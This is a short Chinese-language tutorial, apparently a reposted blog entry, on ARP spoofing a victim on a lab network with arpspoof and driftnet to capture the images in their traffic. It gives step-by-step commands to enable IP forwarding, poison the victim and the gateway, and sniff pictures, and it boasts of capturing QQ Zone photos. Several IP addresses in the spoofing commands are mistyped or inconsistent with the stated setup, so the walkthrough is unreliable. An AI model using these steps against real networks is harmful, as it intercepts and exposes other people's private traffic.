1. 程式人生 > >arpspoof+driftnet+ ARP欺騙簡單圖片抓取

arpspoof+driftnet+ ARP欺騙簡單圖片抓取

roc ipv4 ech 空間 info 受害者 數據 發送 運行

arpspoof+driftnet+ ARP欺騙簡單圖片抓取

driftnet是一款簡單而使用的圖片捕獲工具,可以很方便的在網絡數據包中抓取圖片。該工具可以實時和離線捕獲指定數據包中是圖片
環境

受害ip:192.168.228.130
攻擊ip:192.168.228.129
網關:192.168.228.2

條件

1,開啟或關閉IP轉發
2,向被攻擊機器發送arp欺騙數據包,冒充網關
3,向網關發送arp數據欺騙網關,冒充被攻擊機器
4,運行driftnet截取圖片

開啟IP轉發功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

重定向受害者的流量傳送給攻擊者

arpspoof -t 192.168.130 168.168.228.2 -i eth0

使網關的數據重定向到攻擊者的機器。(流量由網關到攻擊者再到受攻擊者)

arpspoof -t 168.168.228.2 192.168.228.129 -i eth0

監聽

driftnet -i eth0

技術分享圖片
抓到的QQ空間圖片-^^-

arpspoof+driftnet+ ARP欺騙簡單圖片抓取